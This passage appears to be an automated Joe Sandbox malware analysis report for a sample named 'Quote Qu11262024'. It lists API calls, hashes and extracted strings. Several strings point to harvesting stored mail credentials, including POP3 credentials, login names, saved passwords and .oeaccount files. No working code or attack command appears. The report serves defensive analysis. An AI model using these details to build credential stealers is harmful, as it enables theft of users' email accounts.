                                                                                                    • unable to open database: %s, xrefs: 0042EBD6
                                                                                                    • database is already attached, xrefs: 0042EA97
                                                                                                    • too many attached databases - max %d, xrefs: 0042E951
                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                    • out of memory, xrefs: 0042EBEF
                                                                                                    • database %s is already in use, xrefs: 0042E9CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                    • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                    • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                    • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                    • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                    • strchr.MSVCRT ref: 0040327B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringstrchr
                                                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                    • API String ID: 1348940319-1729847305
                                                                                                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                    • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                    • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$sprintfstrchrstrlen
                                                                                                    • String ID: %s@gmail.com
                                                                                                    • API String ID: 3902205911-4097000612
                                                                                                    • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                    • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004094C8
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                    • memset.MSVCRT ref: 0040950C
                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                    • _strcmpi.MSVCRT ref: 00409531
                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                    • String ID: sysdatetimepick32
                                                                                                    • API String ID: 3411445237-4169760276
                                                                                                    • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                    • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                    • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                    • String ID:
                                                                                                    • API String ID: 3642520215-0
                                                                                                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                    • GetDC.USER32(00000000), ref: 004072FB
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 1999381814-0
                                                                                                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                    • API String ID: 1297977491-3883738016
                                                                                                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                    APIs
                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 438689982-4203073231
                                                                                                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldvrm$__aullrem
                                                                                                    • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                    • API String ID: 643879872-978417875
                                                                                                    • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                    • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                    • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                    • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                    • memset.MSVCRT ref: 004058C3
                                                                                                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                    • SetFocus.USER32(?), ref: 00405976
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4281309102-0
                                                                                                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`#v,00000000,?,?,0040A7BE,00000001,0044CBC0,76230A60), ref: 00406D4D
                                                                                                    • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                    • sprintf.MSVCRT ref: 0040A921
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                    • API String ID: 1631269929-4153097237
                                                                                                    • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                    • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040810E
                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,75B4EB20,?), ref: 004081B9
                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                    • API String ID: 524865279-2190619648
                                                                                                    • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                    • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 2300387033-3849865405
                                                                                                    • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                    • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004076D7
                                                                                                    • sprintf.MSVCRT ref: 00407704
                                                                                                    • strlen.MSVCRT ref: 00407710
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                    • strlen.MSVCRT ref: 00407733
                                                                                                    • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                    • String ID: %s (%s)
                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                    • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                    • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscat$memsetsprintf
                                                                                                    • String ID: %2.2X
                                                                                                    • API String ID: 125969286-791839006
                                                                                                    • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                    • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                      • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                    • String ID: ACD
                                                                                                    • API String ID: 1886237854-620537770
                                                                                                    • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                    • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004091EC
                                                                                                    • sprintf.MSVCRT ref: 00409201
